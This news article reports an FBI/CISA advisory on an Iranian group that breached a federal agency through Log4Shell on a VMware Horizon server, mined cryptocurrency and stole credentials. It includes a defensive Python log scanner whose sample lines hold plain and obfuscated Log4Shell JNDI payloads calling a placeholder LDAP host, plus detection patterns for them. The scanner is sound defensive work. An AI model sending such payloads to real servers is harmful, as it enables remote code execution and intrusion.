The FBI and CISA have revealed a joint advisory stating that an unnamed Iranian hacker group has hacked the Federal Civilian Executive Branch (FCEB) to deploy the XMRig crypto mining malware by exploiting the Log4Shell vulnerability in an unpatched VMware Horizon server being used by the organisation.
The initial breach took place even earlier, in February, when attackers exploited the vulnerability tracked as CVE-2021-44228. It was detected during an incident response engagement at the agency that ran from mid-June through mid-July this year.
Outside of deploying the XMRig crypto miner, the threat group also moved laterally to the domain controller and compromised credentials. Additionally, the group set up Ngrok reverse proxies on the hacked servers to maintain persistence within the compromised agency’s network.
The advisory further states that any organisations that haven’t patched their VMware Horizon servers yet should assume that they’ve been breached and deploy the required countermeasures, including searching for malicious activity on their networks.
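One concrete way to act on that advice is to sweep web-server access logs for the Log4j lookup that triggers CVE-2021-44228, including the nested-lookup obfuscation attackers use to hide the string "jndi". The script below is an added example, not tooling from the advisory or from CISA; the log lines and the 203.0.113.10 address are constructed for illustration.

```python
import re

# Inner Log4j lookups used to hide the string "jndi", e.g. ${lower:j},
# ${::-j} or ${env:NOPE:-j}. "/" is excluded from the first group so the
# outer ${jndi:ldap://...} lookup is never mistaken for one of these wrappers.
NESTED_LOOKUP = re.compile(r"\$\{[^{}/]*?:+-?(.)\}")

# The lookup that triggers CVE-2021-44228, matched after de-obfuscation.
JNDI_LOOKUP = re.compile(
    r"\$\{\s*jndi\s*:\s*(ldaps?|rmi|dns|iiop|corba|nds|https?)://[^}\s]*\}",
    re.IGNORECASE,
)


def normalize(text: str) -> str:
    """Collapse nested lookups to their literal character until nothing changes."""
    prev = None
    while prev != text:
        prev, text = text, NESTED_LOOKUP.sub(lambda m: m.group(1), text)
    return text


def find_log4shell(lines: list[str]) -> list[dict]:
    """Return one record per log line carrying a JNDI lookup, with the decoded payload."""
    hits = []
    for number, line in enumerate(lines, start=1):
        match = JNDI_LOOKUP.search(normalize(line))
        if match:
            hits.append({"line": number, "scheme": match.group(1).lower(),
                         "payload": match.group(0)})
    return hits


# Constructed access-log lines (documentation-range IP, not real indicators):
# a benign request, a plain probe, an obfuscated probe, and a harmless
# non-JNDI lookup that must not trigger.
SAMPLE_LOG = [
    '10.0.0.5 - - [11/Feb/2022:03:14:07 +0000] "GET /portal/ HTTP/1.1" 200 5123 "-" "Mozilla/5.0"',
    '10.0.0.9 - - [11/Feb/2022:03:15:22 +0000] "GET /broker/xml HTTP/1.1" 404 0 "-" '
    '"${jndi:ldap://203.0.113.10:1389/a}"',
    '10.0.0.9 - - [11/Feb/2022:03:16:01 +0000] "GET /broker/xml HTTP/1.1" 404 0 "-" '
    '"${${lower:j}${upper:n}${::-d}${env:NOPE:-i}:${lower:l}dap://203.0.113.10:1389/x}"',
    '10.0.0.7 - - [11/Feb/2022:03:17:45 +0000] "GET /portal/?ref=${date:yyyy} HTTP/1.1" 200 88 "-" "curl/7.79"',
]

if __name__ == "__main__":
    for hit in find_log4shell(SAMPLE_LOG):
        print(f"line {hit['line']}: {hit['scheme']} lookup -> {hit['payload']}")
```

A hit only shows that a probe reached the server; whether it succeeded is answered by the outbound LDAP/RMI connections, new processes and reverse-proxy tunnels that the advisory tells responders to look for next.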
The CISA had already warned back in June this year that VMware Horizon and Unified Access Gateway servers were still being targeted by multiple threat actors, including state-sponsored hackers, to breach networks and move laterally once inside to access internal systems storing sensitive data.
The vulnerability was discovered by Alibaba Cloud's security team, which first reported the bug to Apache on November 24, 2021. However, the first proof-of-concept exploit was published on GitHub on December 9, and threat actors have been actively scanning the internet for vulnerable targets ever since.
Following disclosure, the vulnerability turned out to be one of the worst security flaws ever discovered, with vulnerable versions having been downloaded over four million times. CISA (the Cybersecurity and Infrastructure Security Agency) ordered federal civilian agencies to patch systems affected by the Log4Shell vulnerability by Christmas Eve last year.